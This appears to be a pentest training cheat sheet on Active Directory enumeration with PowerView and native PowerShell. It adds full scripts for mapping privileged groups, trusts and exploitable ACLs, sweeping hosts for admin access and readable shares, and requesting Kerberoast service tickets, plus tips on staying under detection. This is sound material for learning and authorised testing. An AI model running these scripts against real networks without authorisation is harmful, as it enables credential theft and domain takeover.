Enumeration by Living Off the Land

The cmdlets below come from two toolsets: the Microsoft ActiveDirectory module (Get-AD*), which only counts as "living off the land" where RSAT or the module DLL is already present on the host, and PowerView (Get-Domain*, Get-Net*, Find-*, Test-AdminAccess), which has to be imported into the session first and is far more likely to be flagged by AV/EDR. Snaffler, at the end, is a separate compiled tool.

1. Identify Active Directory Components

Gather Basic Domain Information

  • Command:

Get-Module -ListAvailable
  • Description: Lists the modules installed on the host (a bare Get-Module only shows modules already loaded into the session); an ActiveDirectory entry means RSAT is present and the Get-AD* cmdlets below will work.

  • Command:

Import-Module ActiveDirectory
  • Description: Loads the ActiveDirectory PowerShell module so the Get-AD* cmdlets can query the domain; this fails when RSAT is not installed (the PowerView cmdlets further down do not depend on it).

  • Command:

Get-ADDomain
  • Description: Retrieves the current domain's name, distinguished name, domain SID, functional level, FSMO role holders and parent/child domain relationships.

2. Enumerate Users and Groups

Identify User Accounts

  • Command:

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
  • Description: Lists user accounts with at least one Service Principal Name (SPN) set, i.e. the Kerberoast candidates covered in section 8.

  • Command:

Get-DomainUser
  • Description: PowerView: retrieves all users, or specific user objects with -Identity, in Active Directory; switches such as -SPN, -AdminCount and -PreauthNotRequired narrow the output to attack-relevant accounts.

Enumerate Groups

  • Command:

Get-ADGroup -Filter * | Select Name
  • Description: Lists all groups in the target Active Directory domain.

  • Command:

Get-ADGroup -Identity "Backup Operators"
  • Description: Retrieves the "Backup Operators" group object. This built-in group holds SeBackupPrivilege on domain controllers, which allows reading any file (including NTDS.dit backups) regardless of NTFS ACLs, so its membership is worth reviewing.

  • Command:

Get-ADGroupMember -Identity "Backup Operators"
  • Description: Retrieves the direct members of the "Backup Operators" group; add -Recursive to expand nested groups.

  • Command:

Get-DomainGroup
  • Description: Returns all groups or specific group objects in Active Directory.

  • Command:

Get-DomainGroupMember -Identity "Domain Admins" -Recurse
  • Description: Lists all members of the "Domain Admins" group recursively.
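The group-enumeration steps above, combined into one native-only script. This is an added example, not code from the original page or from PowerView: it flattens the membership of a set of high-value groups with the ActiveDirectory module and flags the two cases an attacker cares most about, privileged accounts that carry an SPN (Kerberoastable with privileges) and privileged accounts with stale passwords. The group list and the 365-day threshold are assumptions; group names are the default English built-ins.

```powershell
# Added example (not from the original page): flatten the membership of
# high-value groups with the native ActiveDirectory module only and flag the
# cases an attacker cares about: privileged accounts that carry an SPN
# (Kerberoastable with privileges) and privileged accounts with stale passwords.
# The group list assumes default English built-in names; adjust for localized domains.
Import-Module ActiveDirectory

$HighValueGroups = @(
    'Domain Admins', 'Enterprise Admins', 'Administrators', 'Schema Admins',
    'Account Operators', 'Backup Operators', 'Server Operators', 'Print Operators',
    'DnsAdmins', 'Group Policy Creator Owners'
)

function Get-PrivilegedAccountReport {
    param([string[]]$Groups = $HighValueGroups)

    foreach ($GroupName in $Groups) {
        # Skip groups that do not exist here (DnsAdmins is absent without AD-integrated DNS).
        $Group = Get-ADGroup -Filter "Name -eq '$GroupName'" -ErrorAction SilentlyContinue
        if (-not $Group) { Write-Verbose "Skipping missing group $GroupName"; continue }

        # -Recursive flattens nested groups so indirect members show up too.
        $Members = @(Get-ADGroupMember -Identity $Group -Recursive -ErrorAction SilentlyContinue)
        if (-not $Members) {
            # Get-ADGroupMember errors out on groups containing foreignSecurityPrincipal
            # members (accounts from trusted domains); fall back to the raw member
            # attribute, which gives direct members only (not recursive).
            $Members = foreach ($Dn in (Get-ADGroup -Identity $Group -Properties member).member) {
                Get-ADObject -Identity $Dn -Properties sAMAccountName -ErrorAction SilentlyContinue
            }
        }

        foreach ($M in $Members) {
            if ($M.objectClass -ne 'user') {
                # Computers, groups we could not expand, and foreign principals are listed as-is.
                [pscustomobject]@{ Group = $GroupName; Member = $M.Name; Type = $M.objectClass
                                   Enabled = $null; HasSPN = $null; PasswordAgeDays = $null; AdminCount = $null }
                continue
            }
            $U = Get-ADUser -Identity $M.DistinguishedName -Properties ServicePrincipalName, PasswordLastSet, adminCount
            [pscustomobject]@{
                Group           = $GroupName
                Member          = $U.SamAccountName
                Type            = 'user'
                Enabled         = $U.Enabled
                HasSPN          = ($U.ServicePrincipalName.Count -gt 0)
                PasswordAgeDays = $(if ($U.PasswordLastSet) { [int]((Get-Date) - $U.PasswordLastSet).TotalDays } else { $null })
                # adminCount=1 marks objects whose ACL is enforced by AdminSDHolder (SDProp).
                AdminCount      = $U.adminCount
            }
        }
    }
}

$Report = Get-PrivilegedAccountReport
$Report | Sort-Object Group, Member | Format-Table -AutoSize

# Highest-value findings: enabled privileged users with an SPN, or whose
# password is older than a year (the 365-day threshold is an assumption).
$Report | Where-Object { $_.Type -eq 'user' -and $_.Enabled -and ($_.HasSPN -or $_.PasswordAgeDays -gt 365) } |
    Format-Table Group, Member, HasSPN, PasswordAgeDays -AutoSize
```

Everything here is LDAP reads against a domain controller, which any authenticated domain user can perform; the only noise is the LDAP query volume itself. The fallback path matters in multi-domain forests, where Get-ADGroupMember routinely fails on groups such as Administrators that contain principals from trusted domains.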

3. Identify Trusts and Organizational Units (OUs)

Enumerate Trust Relationships

  • Command:

Get-ADTrust -Filter *
  • Description: Lists all trust relationships for the target domain.

  • Command:

Get-DomainTrust
  • Description: Retrieves domain trust information for the current or a specified domain.

  • Command:

Get-ForestTrust
  • Description: PowerView: enumerates forest trusts for the current (or a specified) forest.

  • Command:

Get-DomainTrustMapping
  • Description: PowerView: starting from the current domain, follows every reachable trust and lists the trusts of each trusted domain in turn, producing a map of the whole trust graph.
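The same trust mapping done with the native ActiveDirectory module instead of PowerView, as an added example that is not part of the original page. Get-ADTrust exposes the raw trustAttributes bit field, and decoding it is what tells you whether SID filtering applies (QUARANTINED_DOMAIN, TREAT_AS_EXTERNAL, WITHIN_FOREST) and whether the trust is transitive, which decides which cross-trust attacks are possible. The flag names follow MS-ADTS; the script assumes the trusted domains' DCs are reachable over LDAP.

```powershell
# Added example (not from the original page): map trusts recursively with the
# native ActiveDirectory module, decoding the trustAttributes bit flags that
# determine SID filtering and transitivity. Assumes RSAT is available and the
# trusted domains' DCs are reachable for LDAP from this host.
Import-Module ActiveDirectory

# Bit flags of the trustAttributes attribute (MS-ADTS, section 6.1.6.7.9).
$TrustAttributeFlags = [ordered]@{
    0x0001 = 'NON_TRANSITIVE'
    0x0002 = 'UPLEVEL_ONLY'
    0x0004 = 'QUARANTINED_DOMAIN'      # SID filtering enforced (external trust default)
    0x0008 = 'FOREST_TRANSITIVE'
    0x0010 = 'CROSS_ORGANIZATION'      # selective authentication
    0x0020 = 'WITHIN_FOREST'           # parent/child or tree-root: no SID filtering
    0x0040 = 'TREAT_AS_EXTERNAL'       # forest trust with SID filtering relaxed
    0x0080 = 'USES_RC4_ENCRYPTION'
    0x0200 = 'CROSS_ORGANIZATION_NO_TGT_DELEGATION'
    0x0400 = 'CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION'
    0x0800 = 'PIM_TRUST'
}

function ConvertFrom-TrustAttributes {
    param([int]$Value)
    $Names = foreach ($Flag in $TrustAttributeFlags.Keys) {
        if ($Value -band $Flag) { $TrustAttributeFlags[$Flag] }
    }
    if ($Names) { $Names -join ',' } else { 'NONE' }
}

function Get-TrustMap {
    param([string]$Domain = (Get-ADDomain).DNSRoot)
    $Seen  = [System.Collections.Generic.HashSet[string]]::new([StringComparer]::OrdinalIgnoreCase)
    $Queue = New-Object System.Collections.Queue
    $Queue.Enqueue($Domain)

    while ($Queue.Count -gt 0) {
        $Current = $Queue.Dequeue()
        if (-not $Seen.Add($Current)) { continue }
        # Query the trusted domain's own DCs; a failure usually means no network
        # path or no authentication to that domain, which is itself useful to know.
        try {
            $Trusts = Get-ADTrust -Filter * -Server $Current -ErrorAction Stop
        } catch {
            Write-Warning "Could not query trusts of ${Current}: $($_.Exception.Message)"
            continue
        }
        foreach ($T in $Trusts) {
            [pscustomobject]@{
                Source       = $Current
                Target       = $T.Target
                Direction    = $T.Direction                 # Inbound / Outbound / BiDirectional
                TrustType    = $T.TrustType                 # Uplevel, Downlevel, MIT, ...
                Attributes   = ConvertFrom-TrustAttributes $T.TrustAttributes
                SIDFiltering = $T.SIDFilteringQuarantined
            }
            # Recurse into the trust partner so the whole graph gets mapped.
            if (-not $Seen.Contains($T.Target)) { $Queue.Enqueue($T.Target) }
        }
    }
}

Get-TrustMap | Format-Table -AutoSize
```

A WITHIN_FOREST trust with no SID filtering is the case where a child-domain compromise escalates to the forest (SID history / Enterprise Admins); a QUARANTINED_DOMAIN external trust blocks that, and TREAT_AS_EXTERNAL on a forest trust means the administrator has deliberately relaxed filtering.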

Identify Organizational Units

  • Command:

Get-DomainOU
  • Description: Retrieves all or specific Organizational Units (OUs) in Active Directory.

4. Enumerate Active Directory Objects

Identify Domain Controllers

  • Command:

Get-DomainController
  • Description: Retrieves a list of domain controllers in the target Active Directory domain.

Identify Computers and File Servers

  • Command:

Get-DomainComputer
  • Description: Retrieves all computers or specific computer objects in Active Directory.

  • Command:

Get-DomainFileServer
  • Description: PowerView: identifies servers likely functioning as file servers by extracting the hosts referenced in users' homeDirectory, scriptPath and profilePath attributes.

  • Command:

Get-DomainDFSShare
  • Description: Lists all Distributed File System (DFS) shares for the current or specified domain.

5. Enumerate Group Policy and Permissions

Identify Group Policy Objects (GPOs)

  • Command:

Get-DomainGPO
  • Description: Lists all Group Policy Objects (GPOs) in Active Directory.

  • Command:

Get-DomainPolicy
  • Description: PowerView: parses the Default Domain Policy (or, with -Policy DC, the Default Domain Controllers Policy) from SYSVOL, including the password, lockout and Kerberos settings.

Analyze Active Directory Permissions

  • Command:

Find-InterestingDomainAcl
  • Description: PowerView: finds object ACLs in the domain that grant modification rights (GenericAll, WriteDacl, WriteOwner, WriteProperty, ExtendedRight and similar) to principals that are not default built-ins (RID 1000 or higher); these are the ACL-based privilege-escalation paths.
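A native-only version of the ACL analysis above, added here as an example; it is not code from the original page or from PowerView. It reads each object's nTSecurityDescriptor through the ActiveDirectory module and keeps only ACEs that grant takeover rights to principals that are not default high-privilege built-ins. The GUIDs are the documented schema and extended-right GUIDs; the list of "low-privilege" SIDs treated as attacker-controlled is an assumption.

```powershell
# Added example (not from the original page): a native-only version of what
# Find-InterestingDomainAcl reports. It reads each object's nTSecurityDescriptor
# through the ActiveDirectory module and keeps ACEs that grant takeover rights
# (GenericAll, WriteDacl, WriteOwner, GenericWrite, or WriteProperty/ExtendedRight
# on a dangerous attribute) to principals that are not default high-privilege
# built-ins. The GUIDs are the documented schema/extended-right GUIDs; the
# "low-privilege" SID list is an assumption about identities an attacker holds.
Import-Module ActiveDirectory

$Domain    = Get-ADDomain
$DomainSid = $Domain.DomainSID.Value
$ADR       = [System.DirectoryServices.ActiveDirectoryRights]

# ObjectType GUIDs that turn WriteProperty / ExtendedRight into an escalation path.
$InterestingGuids = @{
    '00000000-0000-0000-0000-000000000000' = 'All properties / all extended rights'
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password'
    'bf9679c0-0de6-11d0-a285-00aa003049e2' = 'member (add accounts to the group)'
    'f3a64788-5306-11d1-a9c5-0000f80367c1' = 'servicePrincipalName (targeted Kerberoast)'
    '3f78c3e5-f79a-46bd-a0b8-9d18116ddc79' = 'msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD)'
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All (DCSync)'
}

# Identities assumed to be attacker-controlled or trivially obtained:
# Everyone, Anonymous, Authenticated Users, BUILTIN\Users, Domain Users, Domain Computers.
$LowPrivSids = @('S-1-1-0', 'S-1-5-7', 'S-1-5-11', 'S-1-5-32-545', "$DomainSid-513", "$DomainSid-515")

function Test-InterestingPrincipal {
    param([System.Security.Principal.IdentityReference]$Identity)
    try   { $Sid = $Identity.Translate([System.Security.Principal.SecurityIdentifier]).Value }
    catch { return $true }                     # unresolvable: orphaned ACE, worth a look
    if ($Sid -in $LowPrivSids) { return $true }
    if ($Sid -like "$DomainSid-*") {
        # Default built-ins (512 Domain Admins, 519 Enterprise Admins, ...) have RIDs < 1000.
        return ([int]$Sid.Substring($DomainSid.Length + 1) -ge 1000)
    }
    # Principals from other domains (via trusts) are never default built-ins here.
    return ($Sid -like 'S-1-5-21-*')
}

function Find-InterestingAce {
    param([string]$SearchBase = $Domain.DistinguishedName)
    # Users (and computers), groups, OUs, GPOs and the domain head (where DCSync rights live).
    $Filter  = '(|(objectClass=user)(objectClass=group)(objectClass=organizationalUnit)(objectClass=groupPolicyContainer)(objectClass=domainDNS))'
    $Objects = Get-ADObject -LDAPFilter $Filter -SearchBase $SearchBase -Properties nTSecurityDescriptor

    foreach ($Obj in $Objects) {
        foreach ($Ace in $Obj.nTSecurityDescriptor.Access) {
            if ($Ace.AccessControlType -ne 'Allow') { continue }
            $Rights = $Ace.ActiveDirectoryRights
            $Guid   = $Ace.ObjectType.ToString()
            $OnDangerousAttr = $InterestingGuids.ContainsKey($Guid)
            # HasFlag rather than -band: GenericAll overlaps every other right's bits.
            $Control = $Rights.HasFlag($ADR::GenericAll) -or $Rights.HasFlag($ADR::WriteDacl) -or
                       $Rights.HasFlag($ADR::WriteOwner) -or $Rights.HasFlag($ADR::GenericWrite) -or
                       ($OnDangerousAttr -and ($Rights.HasFlag($ADR::WriteProperty) -or $Rights.HasFlag($ADR::ExtendedRight)))
            if (-not $Control) { continue }
            if (-not (Test-InterestingPrincipal $Ace.IdentityReference)) { continue }

            [pscustomobject]@{
                Object      = $Obj.DistinguishedName
                ObjectClass = $Obj.ObjectClass
                Principal   = $Ace.IdentityReference.Value
                Rights      = $Rights
                ObjectType  = $(if ($OnDangerousAttr) { $InterestingGuids[$Guid] } else { $Guid })
                Inherited   = $Ace.IsInherited
            }
        }
    }
}

Find-InterestingAce | Format-Table Principal, Rights, ObjectType, Object -AutoSize
```

Reading nTSecurityDescriptor in the LDAP query avoids the AD: drive provider, whose paths break on OU names containing "/" or other special characters. On a large domain, pass -SearchBase to scope the scan to one OU.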

6. Identify Local and Shared Resources

Enumerate Local Groups and Members

  • Command:

Get-NetLocalGroup
  • Description: Retrieves local groups on a remote or local machine.

  • Command:

Get-NetLocalGroupMember
  • Description: Lists members of a specified local group.

Identify Shared Resources

  • Command:

Get-NetShare
  • Description: Retrieves a list of open network shares on a target system.

  • Command:

Get-NetSession
  • Description: PowerView: lists active SMB sessions (NetSessionEnum) on a local or remote machine, revealing which users are connected from which source hosts; on current Windows versions this call is restricted to administrators by default.

  • Command:

Find-DomainShare
  • Description: Searches for accessible shares on domain machines.

  • Command:

Find-InterestingDomainShareFile
  • Description: PowerView: searches readable domain shares for files whose names match sensitive patterns (by default terms such as *password*, *sensitive*, *admin*, *secret*, *creds*, *credential*, unattend*.xml, *.config and *.vmdk).

7. Identify Active Users and Logged-In Sessions

Track Logged-In Users

  • Command:

Find-DomainUserLocation
  • Description: PowerView: identifies machines where specific users are logged in (members of Domain Admins by default) by combining session and logged-on-user data from each host.

Test Administrative Access

  • Command:

Test-AdminAccess
  • Description: Checks if the current user has administrative access to a machine.

  • Command:

Find-LocalAdminAccess
  • Description: Identifies machines in the domain where the current user has local administrator privileges.
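Sections 6 and 7 above, done without PowerView, as an added example that is not part of the original page. It sweeps the domain's live computers and for each one checks whether the current user is a local administrator (the ADMIN$ share maps to %SystemRoot% and is only listable by administrators, the same test many SMB tools use to report admin access) and which shares the host exposes and which of them we can list. Only Get-ADComputer, Test-Path and net.exe are involved; the 30-day staleness cutoff is an assumption.

```powershell
# Added example (not from the original page): a native sweep over domain
# computers that checks (a) local-admin access via the ADMIN$ share and
# (b) which shares each host exposes and which we can list. This is the manual
# form of Find-LocalAdminAccess / Find-DomainShare using only Get-ADComputer,
# Test-Path and net.exe. Hosts idle for 30+ days are skipped (assumed dead).
Import-Module ActiveDirectory

function Get-LiveDomainHosts {
    param([int]$StaleDays = 30)
    $Cutoff = (Get-Date).AddDays(-$StaleDays)
    # lastLogonTimestamp replicates between DCs (with up to ~14 days lag), good enough to prune.
    Get-ADComputer -Filter 'Enabled -eq $true' -Properties DNSHostName, OperatingSystem, lastLogonTimestamp |
        Where-Object { $_.lastLogonTimestamp -and [datetime]::FromFileTime($_.lastLogonTimestamp) -gt $Cutoff } |
        Select-Object Name, DNSHostName, OperatingSystem
}

function Test-HostAccess {
    param([Parameter(Mandatory)][string]$ComputerName)

    # Quick reachability check so dead hosts do not stall the sweep on SMB timeouts.
    $Reachable = Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction SilentlyContinue
    if (-not $Reachable) {
        return [pscustomobject]@{ Host = $ComputerName; Reachable = $false; LocalAdmin = $null; Shares = @(); Readable = @() }
    }

    # ADMIN$ is restricted to local Administrators: listing it means we have admin rights.
    $IsAdmin = Test-Path "\\$ComputerName\ADMIN$" -ErrorAction SilentlyContinue

    # 'net view /all' lists shares including hidden ($) ones; take the first
    # column of each table row (columns are separated by two or more spaces).
    $Shares  = @()
    $NetView = & net.exe view "\\$ComputerName" /all 2>$null
    if ($LASTEXITCODE -eq 0) {
        $InTable = $false
        foreach ($Line in $NetView) {
            if ($Line -match '^-{10,}') { $InTable = $true; continue }
            if (-not $InTable -or [string]::IsNullOrWhiteSpace($Line) -or $Line -match 'command completed') { continue }
            $Shares += ($Line -split '\s{2,}')[0]
        }
    }
    # Test-Path on \\host\share succeeds only if we can at least list the share root.
    $Readable = foreach ($S in $Shares) {
        if ($S -notin 'IPC$', 'print$' -and (Test-Path "\\$ComputerName\$S" -ErrorAction SilentlyContinue)) { $S }
    }

    [pscustomobject]@{
        Host       = $ComputerName
        Reachable  = $true
        LocalAdmin = [bool]$IsAdmin
        Shares     = $Shares
        Readable   = @($Readable | Where-Object { $_ })
    }
}

$Results = Get-LiveDomainHosts | ForEach-Object { Test-HostAccess -ComputerName $_.DNSHostName }
$Results | Where-Object Reachable |
    Format-Table Host, LocalAdmin, @{Name = 'Readable'; Expression = { $_.Readable -join ',' }} -AutoSize
```

This is loud: every host gets an ICMP probe plus several SMB connections, each of which produces a 4624/4625 logon event on the target and, if the SMB traffic is monitored, a clear one-source-to-many-hosts pattern. Scope the host list before running it on an engagement where detection matters.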

8. Extract and Analyze Service Principal Names (SPNs)

Extract SPN Information

  • Command:

Get-DomainSPNTicket
  • Description: PowerView: requests a Kerberos service ticket (TGS) for the specified SPN(s) and returns the encrypted ticket in John/Hashcat format for offline cracking (Kerberoasting).

  • Command:

Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
  • Description: Identifies users with SPN set in Active Directory.
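A native Kerberoast triage for the SPN steps above, added as an example that is not part of the original page or of PowerView. It lists user accounts with SPNs, decodes msDS-SupportedEncryptionTypes to see which accounts will still hand out RC4 service tickets (far cheaper to crack than AES), and requests one ticket per account through the .NET System.IdentityModel classes so the tickets land in the local cache (visible with klist). Turning a cached ticket into a crackable hash still requires a tool that parses the ticket bytes, such as Get-DomainSPNTicket, Rubeus or mimikatz, and is not shown here.

```powershell
# Added example (not from the original page): native Kerberoast candidate triage.
# Lists SPN-bearing users, decodes msDS-SupportedEncryptionTypes to find accounts
# that still accept RC4, then requests service tickets via System.IdentityModel
# (no PowerView/Rubeus). Extracting a crackable hash from the cached tickets is
# left to a ticket-parsing tool.
Import-Module ActiveDirectory
Add-Type -AssemblyName System.IdentityModel

# Bit values of msDS-SupportedEncryptionTypes (MS-KILE, section 2.2.7).
$EncTypes = [ordered]@{ 0x1 = 'DES-CBC-CRC'; 0x2 = 'DES-CBC-MD5'; 0x4 = 'RC4-HMAC'; 0x8 = 'AES128'; 0x10 = 'AES256' }

function Get-KerberoastCandidates {
    # krbtgt is excluded (its ticket is not a useful cracking target) and so are
    # disabled accounts, for which the KDC will not issue service tickets.
    Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName, msDS-SupportedEncryptionTypes, PasswordLastSet, adminCount |
        Where-Object { $_.Enabled -and $_.SamAccountName -ne 'krbtgt' } |
        ForEach-Object {
            $Enc = $_.'msDS-SupportedEncryptionTypes'
            $EncNames = if ($Enc) {
                ($EncTypes.Keys | Where-Object { $Enc -band $_ } | ForEach-Object { $EncTypes[$_] }) -join ','
            } else { 'unset (RC4 unless DC policy overrides)' }
            [pscustomobject]@{
                SamAccountName  = $_.SamAccountName
                SPN             = $_.ServicePrincipalName[0]
                SPNCount        = $_.ServicePrincipalName.Count
                EncTypes        = $EncNames
                RC4Possible     = (-not $Enc) -or [bool]($Enc -band 0x4)
                PasswordAgeDays = $(if ($_.PasswordLastSet) { [int]((Get-Date) - $_.PasswordLastSet).TotalDays } else { $null })
                Privileged      = ($_.adminCount -eq 1)   # protected by AdminSDHolder: high value
            }
        }
}

function Request-ServiceTicket {
    param([Parameter(Mandatory)][string]$Spn)
    # Asks the KDC for a TGS for $Spn using the caller's TGT; the ticket is
    # placed in the LSA cache, which is exactly what a Kerberoast does first.
    try {
        $Token = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $Spn
        $ApReq = $Token.GetRequest()   # raw AP-REQ bytes containing the encrypted service ticket
        [pscustomobject]@{ SPN = $Spn; Requested = $true; TicketBytes = $ApReq.Length; ValidTo = $Token.ValidTo; Error = $null }
    } catch {
        # Typical causes: SPN not registered, account disabled, or no TGT (not domain-authenticated).
        [pscustomobject]@{ SPN = $Spn; Requested = $false; TicketBytes = 0; ValidTo = $null; Error = $_.Exception.Message }
    }
}

$Candidates = Get-KerberoastCandidates
# Prioritise privileged accounts and old passwords that still accept RC4.
$Candidates |
    Sort-Object @{Expression = 'Privileged'; Descending = $true}, @{Expression = 'PasswordAgeDays'; Descending = $true} |
    Format-Table SamAccountName, RC4Possible, EncTypes, PasswordAgeDays, Privileged, SPN -AutoSize

$Candidates | ForEach-Object { Request-ServiceTicket -Spn $_.SPN } | Format-Table -AutoSize
klist   # the requested service tickets are now visible in the cache
```

Each ticket request produces a 4769 event on the DC; a burst of 4769s for many different SPNs from one client, especially with encryption type 0x17 (RC4), is the standard Kerberoasting detection, so request only the tickets you intend to crack.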

9. Export Enumeration Data for Offline Analysis

Convert Data for Further Processing

  • Command:

Export-PowerViewCSV
  • Description: Saves PowerView enumeration results to a CSV file.

  • Command:

ConvertTo-SID
  • Description: Converts a user or group name to its Security Identifier (SID).

Automate Sensitive Data Discovery

  • Command:

./Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data
  • Description: Uses Snaffler (a separate compiled tool, not a built-in) to find credential- and secret-bearing files on the shares readable by the current user in the INLANEFREIGHT.LOCAL domain; -s prints results to stdout and -v data limits output to the file hits themselves.